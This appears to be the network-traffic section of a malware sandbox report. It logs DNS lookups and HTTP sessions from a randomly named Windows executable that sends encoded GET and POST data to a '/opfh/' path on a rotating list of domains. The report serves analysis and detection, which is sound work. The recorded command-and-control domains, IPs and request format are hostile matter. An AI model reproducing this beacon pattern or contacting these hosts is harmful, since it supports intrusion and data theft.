May 27, 2024 12:20:08.775738955 CEST	59922	53	192.168.2.7	1.1.1.1
May 27, 2024 12:20:08.813746929 CEST	53	59922	1.1.1.1	192.168.2.7
May 27, 2024 12:20:24.511812925 CEST	59104	53	192.168.2.7	1.1.1.1
May 27, 2024 12:20:24.690995932 CEST	53	59104	1.1.1.1	192.168.2.7
May 27, 2024 12:20:38.403372049 CEST	60304	53	192.168.2.7	1.1.1.1
May 27, 2024 12:20:38.416935921 CEST	53	60304	1.1.1.1	192.168.2.7
May 27, 2024 12:20:51.534323931 CEST	53681	53	192.168.2.7	1.1.1.1
May 27, 2024 12:20:51.732665062 CEST	53	53681	1.1.1.1	192.168.2.7
May 27, 2024 12:21:04.840253115 CEST	62631	53	192.168.2.7	1.1.1.1
May 27, 2024 12:21:04.886538982 CEST	53	62631	1.1.1.1	192.168.2.7
May 27, 2024 12:21:20.027914047 CEST	51390	53	192.168.2.7	1.1.1.1
May 27, 2024 12:21:20.226238012 CEST	53	51390	1.1.1.1	192.168.2.7
May 27, 2024 12:21:34.934665918 CEST	59005	53	192.168.2.7	1.1.1.1
May 27, 2024 12:21:34.980176926 CEST	53	59005	1.1.1.1	192.168.2.7
May 27, 2024 12:21:48.700105906 CEST	52913	53	192.168.2.7	1.1.1.1
May 27, 2024 12:21:48.718168974 CEST	53	52913	1.1.1.1	192.168.2.7
May 27, 2024 12:22:02.045412064 CEST	52987	53	192.168.2.7	1.1.1.1
May 27, 2024 12:22:02.696774960 CEST	53	52987	1.1.1.1	192.168.2.7
May 27, 2024 12:22:16.152982950 CEST	65343	53	192.168.2.7	1.1.1.1
May 27, 2024 12:22:16.349999905 CEST	53	65343	1.1.1.1	192.168.2.7
May 27, 2024 12:22:29.527311087 CEST	59049	53	192.168.2.7	1.1.1.1
May 27, 2024 12:22:29.536874056 CEST	53	59049	1.1.1.1	192.168.2.7
May 27, 2024 12:22:38.933196068 CEST	51494	53	192.168.2.7	1.1.1.1
May 27, 2024 12:22:39.030888081 CEST	53	51494	1.1.1.1	192.168.2.7
May 27, 2024 12:22:52.370800018 CEST	56095	53	192.168.2.7	1.1.1.1
May 27, 2024 12:22:52.479981899 CEST	53	56095	1.1.1.1	192.168.2.7
May 27, 2024 12:23:06.024713993 CEST	64963	53	192.168.2.7	1.1.1.1
May 27, 2024 12:23:06.040009975 CEST	53	64963	1.1.1.1	192.168.2.7
May 27, 2024 12:23:20.104852915 CEST	54834	53	192.168.2.7	1.1.1.1
May 27, 2024 12:23:20.167999983 CEST	53	54834	1.1.1.1	192.168.2.7
May 27, 2024 12:23:34.933322906 CEST	55358	53	192.168.2.7	1.1.1.1
May 27, 2024 12:23:34.943599939 CEST	53	55358	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 27, 2024 12:20:08.775738955 CEST	192.168.2.7	1.1.1.1	0xa025	Standard query (0)	www.batchscraper.com	A (IP address)	IN (0x0001)	false
May 27, 2024 12:20:24.511812925 CEST	192.168.2.7	1.1.1.1	0x9cf9	Standard query (0)	www.auronhouse.com	A (IP address)	IN (0x0001)	false
May 27, 2024 12:20:38.403372049 CEST	192.168.2.7	1.1.1.1	0x933e	Standard query (0)	www.ukscan.co.uk	A (IP address)	IN (0x0001)	false
May 27, 2024 12:20:51.534323931 CEST	192.168.2.7	1.1.1.1	0x6f32	Standard query (0)	www.swordshoop.ca	A (IP address)	IN (0x0001)	false
May 27, 2024 12:21:04.840253115 CEST	192.168.2.7	1.1.1.1	0x7d93	Standard query (0)	www.fruitique.co.uk	A (IP address)	IN (0x0001)	false
May 27, 2024 12:21:20.027914047 CEST	192.168.2.7	1.1.1.1	0xd48	Standard query (0)	www.gamemaster.at	A (IP address)	IN (0x0001)	false
May 27, 2024 12:21:34.934665918 CEST	192.168.2.7	1.1.1.1	0x74	Standard query (0)	www.annahaywardva.co.uk	A (IP address)	IN (0x0001)	false
May 27, 2024 12:21:48.700105906 CEST	192.168.2.7	1.1.1.1	0x47fa	Standard query (0)	www.ziontool.xyz	A (IP address)	IN (0x0001)	false
May 27, 2024 12:22:02.045412064 CEST	192.168.2.7	1.1.1.1	0x2727	Standard query (0)	www.busypro.net	A (IP address)	IN (0x0001)	false
May 27, 2024 12:22:16.152982950 CEST	192.168.2.7	1.1.1.1	0xf264	Standard query (0)	www.performacetoyota.ca	A (IP address)	IN (0x0001)	false
May 27, 2024 12:22:29.527311087 CEST	192.168.2.7	1.1.1.1	0xbb85	Standard query (0)	www.digishieldu.online	A (IP address)	IN (0x0001)	false
May 27, 2024 12:22:38.933196068 CEST	192.168.2.7	1.1.1.1	0x1f5d	Standard query (0)	www.pricekaboom.com	A (IP address)	IN (0x0001)	false
May 27, 2024 12:22:52.370800018 CEST	192.168.2.7	1.1.1.1	0x325e	Standard query (0)	www.drapples.club	A (IP address)	IN (0x0001)	false
May 27, 2024 12:23:06.024713993 CEST	192.168.2.7	1.1.1.1	0x1659	Standard query (0)	www.autonomyai.xyz	A (IP address)	IN (0x0001)	false
May 27, 2024 12:23:20.104852915 CEST	192.168.2.7	1.1.1.1	0xd689	Standard query (0)	www.pharmacielorraine.fr	A (IP address)	IN (0x0001)	false
May 27, 2024 12:23:34.933322906 CEST	192.168.2.7	1.1.1.1	0x7b61	Standard query (0)	www.y94hr.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 27, 2024 12:20:08.813746929 CEST	1.1.1.1	192.168.2.7	0xa025	No error (0)	www.batchscraper.com		172.67.190.203	A (IP address)	IN (0x0001)	false
May 27, 2024 12:20:08.813746929 CEST	1.1.1.1	192.168.2.7	0xa025	No error (0)	www.batchscraper.com		104.21.10.192	A (IP address)	IN (0x0001)	false
May 27, 2024 12:20:24.690995932 CEST	1.1.1.1	192.168.2.7	0x9cf9	No error (0)	www.auronhouse.com	ghs.googlehosted.com		CNAME (Canonical name)	IN (0x0001)	false
May 27, 2024 12:20:24.690995932 CEST	1.1.1.1	192.168.2.7	0x9cf9	No error (0)	ghs.googlehosted.com		142.250.186.51	A (IP address)	IN (0x0001)	false
May 27, 2024 12:20:38.416935921 CEST	1.1.1.1	192.168.2.7	0x933e	No error (0)	www.ukscan.co.uk	ukscan.co.uk		CNAME (Canonical name)	IN (0x0001)	false
May 27, 2024 12:20:38.416935921 CEST	1.1.1.1	192.168.2.7	0x933e	No error (0)	ukscan.co.uk		3.33.130.190	A (IP address)	IN (0x0001)	false
May 27, 2024 12:20:38.416935921 CEST	1.1.1.1	192.168.2.7	0x933e	No error (0)	ukscan.co.uk		15.197.148.33	A (IP address)	IN (0x0001)	false
May 27, 2024 12:20:51.732665062 CEST	1.1.1.1	192.168.2.7	0x6f32	No error (0)	www.swordshoop.ca		199.59.243.225	A (IP address)	IN (0x0001)	false
May 27, 2024 12:21:04.886538982 CEST	1.1.1.1	192.168.2.7	0x7d93	No error (0)	www.fruitique.co.uk		212.227.172.253	A (IP address)	IN (0x0001)	false
May 27, 2024 12:21:20.226238012 CEST	1.1.1.1	192.168.2.7	0xd48	No error (0)	www.gamemaster.at		199.59.243.225	A (IP address)	IN (0x0001)	false
May 27, 2024 12:21:34.980176926 CEST	1.1.1.1	192.168.2.7	0x74	No error (0)	www.annahaywardva.co.uk		213.171.195.105	A (IP address)	IN (0x0001)	false
May 27, 2024 12:21:48.718168974 CEST	1.1.1.1	192.168.2.7	0x47fa	No error (0)	www.ziontool.xyz		203.161.43.227	A (IP address)	IN (0x0001)	false
May 27, 2024 12:22:02.696774960 CEST	1.1.1.1	192.168.2.7	0x2727	No error (0)	www.busypro.net		160.251.148.118	A (IP address)	IN (0x0001)	false
May 27, 2024 12:22:16.349999905 CEST	1.1.1.1	192.168.2.7	0xf264	No error (0)	www.performacetoyota.ca		199.59.243.225	A (IP address)	IN (0x0001)	false
May 27, 2024 12:22:29.536874056 CEST	1.1.1.1	192.168.2.7	0xbb85	Name error (3)	www.digishieldu.online	none	none	A (IP address)	IN (0x0001)	false
May 27, 2024 12:22:39.030888081 CEST	1.1.1.1	192.168.2.7	0x1f5d	No error (0)	www.pricekaboom.com	pricekaboom.com		CNAME (Canonical name)	IN (0x0001)	false
May 27, 2024 12:22:39.030888081 CEST	1.1.1.1	192.168.2.7	0x1f5d	No error (0)	pricekaboom.com		185.31.240.240	A (IP address)	IN (0x0001)	false
May 27, 2024 12:22:52.479981899 CEST	1.1.1.1	192.168.2.7	0x325e	No error (0)	www.drapples.club	94950.bodis.com		CNAME (Canonical name)	IN (0x0001)	false
May 27, 2024 12:22:52.479981899 CEST	1.1.1.1	192.168.2.7	0x325e	No error (0)	94950.bodis.com		199.59.243.225	A (IP address)	IN (0x0001)	false
May 27, 2024 12:23:06.040009975 CEST	1.1.1.1	192.168.2.7	0x1659	No error (0)	www.autonomyai.xyz	autonomyai.xyz		CNAME (Canonical name)	IN (0x0001)	false
May 27, 2024 12:23:06.040009975 CEST	1.1.1.1	192.168.2.7	0x1659	No error (0)	autonomyai.xyz		3.33.130.190	A (IP address)	IN (0x0001)	false
May 27, 2024 12:23:06.040009975 CEST	1.1.1.1	192.168.2.7	0x1659	No error (0)	autonomyai.xyz		15.197.148.33	A (IP address)	IN (0x0001)	false
May 27, 2024 12:23:20.167999983 CEST	1.1.1.1	192.168.2.7	0xd689	No error (0)	www.pharmacielorraine.fr		91.195.240.92	A (IP address)	IN (0x0001)	false
May 27, 2024 12:23:34.943599939 CEST	1.1.1.1	192.168.2.7	0x7b61	No error (0)	www.y94hr.top	y94hr.top		CNAME (Canonical name)	IN (0x0001)	false
May 27, 2024 12:23:34.943599939 CEST	1.1.1.1	192.168.2.7	0x7b61	No error (0)	y94hr.top		38.47.207.149	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.batchscraper.com

www.auronhouse.com

www.ukscan.co.uk

www.swordshoop.ca

www.fruitique.co.uk

www.gamemaster.at

www.annahaywardva.co.uk

www.ziontool.xyz

www.busypro.net

www.performacetoyota.ca

www.pricekaboom.com

www.drapples.club

www.autonomyai.xyz

www.pharmacielorraine.fr

www.y94hr.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	63160	172.67.190.203	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:20:08.835238934 CEST	460	OUT	GET /opfh/?R40L6=AGl44rzTw2dIC+2fJHSMY5CagqpMx9ss+xDw2ILHnY0V4XytCPUwKd/QF5kiL9X2gIgUWxZ6E+yGLjvXAstM4MAyIKs/O1HO2djzFZ+svgnMXhmr1Gwb4CXwLPvvhByMEXNfrkehm32q&b2PX=hZXl7VFPKl04 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Host: www.batchscraper.com Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
May 27, 2024 12:20:09.468306065 CEST	1236	IN	HTTP/1.1 200 OK Date: Mon, 27 May 2024 10:20:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Expires: Mon, 27 May 2024 11:20:09 GMT Cache-Control: max-age=3600 Cache-Control: public Pragma: public Content-Security-Policy: default-src http: 'unsafe-inline' 'unsafe-eval' X-Frame-Options: SAMEORIGIN X-Xss-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Request-Id: 214984b021942b0002f31025b82d1069 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qYRjX8OMl3A6rTEnQ8bUtQQnWB4pQuRFAVKR06izzTSy7mrXn01KBU%2FEo6hA2gqLBalvw2Pmi5CRHc6%2BU95Vo5%2FlDHW3Xzy4c2u52qZ7HQia4BRYET5OEj%2Bt9Pr717xJnLSUc6qsfA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 88a5454dbf147cf6-EWR alt-svc: h2=":443"; ma=60 Data Raw: 32 37 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 46 72 61 6d 65 73 65 74 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 66 72 61 6d 65 73 65 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 21 20 4d 61 6e 61 67 65 64 20 62 79 20 61 6e 73 69 62 6c 65 20 72 6f 6c 65 3a 20 69 6e 77 78 5f 69 6e 61 63 74 69 76 65 5f 64 6f 6d 61 69 6e 73 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 Data Ascii: 276<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><! Managed by ansible role: inwx_inactive_domains ><head> <meta http-equiv="content-type" content="text/html; cha
May 27, 2024 12:20:09.468329906 CEST	337	IN	Data Raw: 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 52 4f 42 4f 54 53 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 49 4e 44 45 58 2c 20 4e 4f 46 4f 4c 4c 4f 57 22 3e 0a 20 20 20 20 3c 74 69 74 6c Data Ascii: rset=iso-8859-1" /> <meta name="ROBOTS" content="NOINDEX, NOFOLLOW"> <title>www.batchscraper.com has been registered</title></head><body><p align="center"><font face="Verdana, Arial, Helvetica, serif" size=2>www.batchscraper.co

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	63161	142.250.186.51	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:20:24.700797081 CEST	717	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.auronhouse.com Origin: http://www.auronhouse.com Referer: http://www.auronhouse.com/opfh/ Cache-Control: max-age=0 Content-Length: 218 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 32 55 47 36 37 37 75 49 44 47 46 59 71 58 45 30 64 6d 35 39 2b 4c 45 42 64 72 43 6c 41 5a 4c 5a 39 35 56 52 69 30 55 68 4f 46 42 43 7a 76 6c 35 70 53 56 58 49 51 4a 2b 76 44 55 4d 32 4c 62 7a 61 5a 4d 64 44 66 4b 46 2f 4f 4a 38 6c 33 5a 69 55 49 66 56 31 6f 73 73 54 37 49 61 48 78 4f 4c 51 31 6d 57 6b 78 79 36 67 39 6b 72 75 49 44 39 5a 79 4f 65 52 72 2f 74 72 76 34 43 65 72 65 42 67 78 72 5a 68 74 72 38 49 55 43 2f 4f 35 58 35 6d 4d 51 33 53 67 59 58 6c 43 2b 31 36 6d 37 46 58 75 42 6a 7a 5a 6c 52 35 62 5a 31 70 36 45 56 74 62 45 35 74 78 38 79 6f 73 54 72 65 38 63 35 52 55 2f 6a 67 66 4e 50 43 34 78 33 44 46 66 69 57 41 3d 3d Data Ascii: R40L6=2UG677uIDGFYqXE0dm59+LEBdrClAZLZ95VRi0UhOFBCzvl5pSVXIQJ+vDUM2LbzaZMdDfKF/OJ8l3ZiUIfV1ossT7IaHxOLQ1mWkxy6g9kruID9ZyOeRr/trv4CereBgxrZhtr8IUC/O5X5mMQ3SgYXlC+16m7FXuBjzZlR5bZ1p6EVtbE5tx8yosTre8c5RU/jgfNPC4x3DFfiWA==
May 27, 2024 12:20:25.357758999 CEST	248	IN	HTTP/1.1 302 Found Location: https://www.auronhouse.com/opfh/ X-Cloud-Trace-Context: 7dc1c9f5998528f4ef7d210cf7b8a1a2 Date: Mon, 27 May 2024 10:20:25 GMT Content-Type: text/html Server: Google Frontend Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	63162	142.250.186.51	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:20:27.241489887 CEST	737	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.auronhouse.com Origin: http://www.auronhouse.com Referer: http://www.auronhouse.com/opfh/ Cache-Control: max-age=0 Content-Length: 238 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 32 55 47 36 37 37 75 49 44 47 46 59 73 32 30 30 66 46 52 39 32 4c 45 43 53 4c 43 6c 4b 35 4c 64 39 35 5a 52 69 33 5a 36 50 33 6c 43 30 4e 39 35 75 67 78 58 4c 51 4a 2b 6c 6a 55 4a 37 72 62 6b 61 5a 51 6a 44 61 79 46 2f 50 70 38 6c 32 70 69 55 62 33 57 30 34 73 75 62 62 49 69 66 52 4f 4c 51 31 6d 57 6b 77 43 45 67 35 41 72 75 35 7a 39 5a 58 75 64 4f 62 2f 71 38 66 34 43 61 72 65 46 67 78 71 4d 68 73 33 57 49 57 71 2f 4f 37 2f 35 6c 5a 77 77 4a 51 59 52 68 43 2f 41 2b 44 61 38 62 2b 35 58 38 4b 41 49 7a 36 42 75 68 73 5a 33 33 35 49 56 7a 67 45 4a 73 75 33 64 4a 61 42 4d 54 56 37 37 74 39 35 75 64 50 55 64 4f 58 2b 6d 41 37 67 4e 69 41 44 56 41 79 4f 32 39 4f 79 53 35 35 71 5a 59 4d 73 3d Data Ascii: R40L6=2UG677uIDGFYs200fFR92LECSLClK5Ld95ZRi3Z6P3lC0N95ugxXLQJ+ljUJ7rbkaZQjDayF/Pp8l2piUb3W04subbIifROLQ1mWkwCEg5Aru5z9ZXudOb/q8f4CareFgxqMhs3WIWq/O7/5lZwwJQYRhC/A+Da8b+5X8KAIz6BuhsZ335IVzgEJsu3dJaBMTV77t95udPUdOX+mA7gNiADVAyO29OyS55qZYMs=
May 27, 2024 12:20:27.901139975 CEST	248	IN	HTTP/1.1 302 Found Location: https://www.auronhouse.com/opfh/ X-Cloud-Trace-Context: 3f7bbcde1e52e3bf4d23e291aa864203 Date: Mon, 27 May 2024 10:20:27 GMT Content-Type: text/html Server: Google Frontend Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	63163	142.250.186.51	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:20:29.784356117 CEST	1750	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.auronhouse.com Origin: http://www.auronhouse.com Referer: http://www.auronhouse.com/opfh/ Cache-Control: max-age=0 Content-Length: 1250 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 32 55 47 36 37 37 75 49 44 47 46 59 73 32 30 30 66 46 52 39 32 4c 45 43 53 4c 43 6c 4b 35 4c 64 39 35 5a 52 69 33 5a 36 50 33 74 43 30 38 64 35 74 42 78 58 4b 51 4a 2b 37 7a 55 49 37 72 62 6c 61 5a 49 6e 44 61 50 2b 2f 4b 74 38 6b 56 78 69 46 36 33 57 2f 34 73 75 5a 62 49 5a 48 78 4f 43 51 30 4b 61 6b 77 79 45 67 35 41 72 75 37 72 39 51 69 4f 64 49 62 2f 74 72 76 34 4f 65 72 66 61 67 78 79 63 68 73 6a 73 64 32 4b 2f 4f 62 50 35 32 61 59 77 55 67 59 54 73 69 2f 59 2b 44 65 64 62 2b 6c 71 38 4c 31 6e 7a 34 42 75 79 64 77 7a 68 39 51 2f 6c 57 49 48 6a 59 72 72 43 73 51 39 66 58 76 55 67 61 4e 4e 57 73 49 55 47 55 47 33 55 64 77 4b 79 6a 54 6f 4f 32 32 56 32 71 62 32 72 36 4c 62 5a 4d 53 6c 48 59 44 77 71 66 4d 79 56 5a 39 38 55 45 53 2f 4f 4d 32 33 47 4d 53 4a 54 71 69 45 67 2f 6c 33 39 55 6d 39 55 4d 30 70 38 46 76 51 56 4e 68 78 63 55 52 68 4e 38 6c 51 32 68 6d 69 65 62 30 69 78 6a 52 61 51 50 6d 33 70 2f 4e 2b 6d 4f 71 73 4c 50 67 45 5a 52 37 2f 42 54 41 44 45 68 51 52 41 74 67 76 [TRUNCATED] Data Ascii: R40L6=2UG677uIDGFYs200fFR92LECSLClK5Ld95ZRi3Z6P3tC08d5tBxXKQJ+7zUI7rblaZInDaP+/Kt8kVxiF63W/4suZbIZHxOCQ0KakwyEg5Aru7r9QiOdIb/trv4Oerfagxychsjsd2K/ObP52aYwUgYTsi/Y+Dedb+lq8L1nz4Buydwzh9Q/lWIHjYrrCsQ9fXvUgaNNWsIUGUG3UdwKyjToO22V2qb2r6LbZMSlHYDwqfMyVZ98UES/OM23GMSJTqiEg/l39Um9UM0p8FvQVNhxcURhN8lQ2hmieb0ixjRaQPm3p/N+mOqsLPgEZR7/BTADEhQRAtgvl1uDFF7KR2nQDll6R3HDRW/0d9zcTCw/dsd9h1Gtco8mQXAFGWhJZDk8T5ww4ICvNIvJLOyv/WZTMePZ9IiCsCMapVF/pP8nTSIPDPwwX4y9HJlsmUR0BrG+3wyuVAAda5GFEQlxioentIw+QUE9RL56srB0UKmIIq9rsg4pjJ8sEXlJ5Wk5H5+zOFGqS8m1BuWdFivcDExlzXvAIk1e5GKmMwDCuHOE97hubqQJdyIXzVrXPVl4pcOkwOJ+kVGWSULLPimlQtt+AFc++Cu+JWZ85ZaTUOff42rsnfkjUmmIJQ4AXoLYycV/VE/eU4ecIleuAeZc7YeuD5c8WkwySqWLD04WOCaO+jsdnlZIcP8yy1Lz+PPlMwV0t6GMR2xZSJQ46DVLrB/tktoc0CO6py1e2LPmYQl3Y+uL7lT/ZOW/Oqn2vcxZIWBPHqdk4OmlATpQFwgk/vrGZ5YmjOMQnlXydE3VeNoeXQOYkQ0NPwE/6sckfH7fQfUB7+rlYx1vi3RWUPlMk/kcY8eRJbOEZU6ITXI4i/2oOJbjuy/3PPn5o4CwxI5LrgUEjpZWxC44b6TWINbVtcc1nWtT95qM/Jwwj1igPXvTsxnQ7AfCvlrxRbU4bUeq6TtVCd69jFvRidAS9zFLIbR+pbbXSBiDAYrlCaElWAnK8+ [TRUNCATED]
May 27, 2024 12:20:30.429518938 CEST	248	IN	HTTP/1.1 302 Found Location: https://www.auronhouse.com/opfh/ X-Cloud-Trace-Context: 22763b0ba995d9ffb3f430f039f93bf7 Date: Mon, 27 May 2024 10:20:30 GMT Content-Type: text/html Server: Google Frontend Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	63164	142.250.186.51	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:20:32.726865053 CEST	458	OUT	GET /opfh/?R40L6=7Wua4PKYKhchrV0dSktA0JoUSva1JJLdwMIZklFmHGZRtcxczCNUWysLgxYx/pnfXqYHMYy3waVzlkYFJZPX15RsNLA3Qz23CQiAilW87ptstt/8e1muReOX5esxW5+HpDKanOvxLVS9&b2PX=hZXl7VFPKl04 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Host: www.auronhouse.com Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
May 27, 2024 12:20:33.376640081 CEST	413	IN	HTTP/1.1 302 Found Location: https://www.auronhouse.com/opfh/?R40L6=7Wua4PKYKhchrV0dSktA0JoUSva1JJLdwMIZklFmHGZRtcxczCNUWysLgxYx/pnfXqYHMYy3waVzlkYFJZPX15RsNLA3Qz23CQiAilW87ptstt/8e1muReOX5esxW5+HpDKanOvxLVS9&b2PX=hZXl7VFPKl04 X-Cloud-Trace-Context: b08bad645b3fc7c7059802359242fa8a Date: Mon, 27 May 2024 10:20:33 GMT Content-Type: text/html Server: Google Frontend Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	63166	3.33.130.190	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:20:38.430928946 CEST	711	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.ukscan.co.uk Origin: http://www.ukscan.co.uk Referer: http://www.ukscan.co.uk/opfh/ Cache-Control: max-age=0 Content-Length: 218 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 6b 75 62 66 6d 6b 63 75 47 52 65 4e 54 4e 44 6b 55 78 64 44 48 64 69 30 72 4d 45 7a 4b 41 5a 4f 34 73 67 36 6d 48 71 30 4b 77 44 55 76 49 30 4d 33 67 2b 75 72 4d 4f 38 45 72 38 5a 65 50 76 77 37 54 32 7a 30 58 69 54 2f 52 4b 79 66 70 45 6a 66 59 68 6d 78 57 6d 46 70 7a 73 75 31 41 49 4a 75 44 69 72 44 55 35 54 32 38 70 75 6b 74 6a 67 70 44 47 4d 52 35 32 49 77 69 62 52 4b 65 78 69 46 61 6b 43 64 48 6c 42 78 6e 35 4b 78 70 4e 71 6a 6e 46 67 78 4d 45 51 39 65 6f 6d 53 76 78 49 56 74 44 47 63 6f 64 66 44 30 4d 6e 2f 79 71 55 54 62 41 42 72 54 7a 64 4f 35 4f 48 6a 4b 7a 49 35 64 71 44 4f 64 34 4e 6f 59 6b 47 2b 39 57 31 2f 67 3d 3d Data Ascii: R40L6=kubfmkcuGReNTNDkUxdDHdi0rMEzKAZO4sg6mHq0KwDUvI0M3g+urMO8Er8ZePvw7T2z0XiT/RKyfpEjfYhmxWmFpzsu1AIJuDirDU5T28puktjgpDGMR52IwibRKexiFakCdHlBxn5KxpNqjnFgxMEQ9eomSvxIVtDGcodfD0Mn/yqUTbABrTzdO5OHjKzI5dqDOd4NoYkG+9W1/g==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	63167	3.33.130.190	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
